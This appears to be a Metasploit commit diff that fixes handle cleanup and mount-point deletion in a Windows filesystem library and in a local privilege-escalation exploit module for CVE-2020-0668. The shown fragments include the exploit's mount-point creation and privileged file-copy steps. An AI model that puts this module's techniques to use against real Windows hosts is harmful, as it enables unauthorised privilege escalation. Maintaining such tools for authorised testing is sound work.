Land #13897, Fix dangling reference issue in cve_2020_0688_service_tracing.rb

and filesystem.rb Merge branch 'land-13897' into upstream-master
2020-08-05 17:04:15 -05:00 · 2020-08-05 17:04:15 -05:00 · ba7f1ea486
parent 18b2c32c78 b6bce114ea
commit ba7f1ea486
2 changed files with 11 additions and 23 deletions
--- a/lib/msf/core/post/windows/filesystem.rb
+++ b/lib/msf/core/post/windows/filesystem.rb
@ -185,7 +185,10 @@ module Msf

          unless result['return']
            print_error("Error deleting the reparse point. Windows Error Code: #{result['GetLastError']} - #{result['ErrorMessage']}")
+            return -1
          end
+           
+          session.railgun.kernel32.CloseHandle(handle)          
          result['return']
        end

@ -209,14 +212,10 @@ module Msf
          handle
        end

-        def delete_mount_point(path)
-          buffer = ReparseGuidDataBuffer.new
-          buffer.reparse_tag = IO_REPARSE_TAG_MOUNT_POINT
-
-          handle = open_reparse_point(path, true)
+        def delete_mount_point(path, handle)
          return nil unless handle
-
-          delete_reparse_point(handle, buffer.to_binary_s)
+          session.fs.dir.rmdir(path) # Might need some more logic here.
+          session.railgun.kernel32.CloseHandle(handle)
        end

        def write_to_memory(process, str)
@ -327,6 +326,7 @@ module Msf
          return nil unless handle

          set_reparse_point(handle, reparse_data.to_binary_s)
+          handle
        end
      end # FileSystem
    end # Windows
--- a/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb
+++ b/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb
@ -80,7 +80,6 @@ class MetasploitModule < Msf::Exploit::Local
      OptString.new('PHONEBOOK_UPLOAD_NAME',
                    [false, 'The name of the phonebook file to trigger RASDIAL (%RAND% by default).', nil])
    ])
-    # stores open handles to cleanup properly
  end

  def write_reg_value(registry_hash)
@ -148,18 +147,6 @@ class MetasploitModule < Msf::Exploit::Local
    end
  end

-  def cleanup_mountpoint(dir)
-    print_status("Delete mountpoint #{dir}")
-    unless delete_mount_point(dir)
-      print_error('Error when deleting the mount point.')
-    end
-    begin
-      session.fs.dir.rmdir(dir)
-    rescue Rex::Post::Meterpreter::RequestError
-      print_error("Error when deleting \"#{dir}\".")
-    end
-  end
-
  def setup_process
    begin
      print_status('Launching notepad to host the exploit...')
@ -202,7 +189,7 @@ class MetasploitModule < Msf::Exploit::Local
  end

  def rastapi_privileged_filecopy(file_contents, exploit_dir, upload_payload_pathname, target_payload_pathname)
-    handles = []
+    handles = [] # stores open handles to cleanup properly
    reg_hash = create_reg_hash(file_contents.length - 1, exploit_dir)
    vprint_status("Registry hash = #{reg_hash}")

@ -215,7 +202,8 @@ class MetasploitModule < Msf::Exploit::Local

    # Create mountpoint
    print_status('Creating mountpoint')
-    unless create_mount_point(exploit_dir, mount_dir)
+    mount_point_handle = create_mount_point(exploit_dir, mount_dir)
+    unless mount_point_handle
      fail_with(Failure::Unknown, 'Error when creating the mount point... aborting.')
    end

@ -270,7 +258,7 @@ class MetasploitModule < Msf::Exploit::Local
      vprint_status("Closing symlink handle #{handle}: #{result['ErrorMessage']}")
    end
    print_status('Removing Mountpoint')
-    session.fs.dir.rmdir(exploit_dir)
+    delete_mount_point(exploit_dir, mount_point_handle)
    print_status('Removing directories')
    unless moved_md5 == upload_md5
      fail_with(Failure::Unknown, 'Payload hashes do not match; filecopy failed.')